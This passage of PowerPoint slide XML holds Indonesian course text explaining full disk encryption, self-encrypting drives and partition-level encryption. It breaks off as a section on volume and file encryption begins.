              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. FDE juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kosong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. FDE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencurian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk. Disk yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file data. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware disk. Drive yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SED) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hard disk drive (HDD), solid-state drive (SSD), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> USB flash drive. Firmware disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptoprosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>HDD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diformat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> volume di OS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi-partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk. Partisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> boot, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan data. Partisi boot dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibiarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file-file OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>partisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Volume dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata lain, volume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
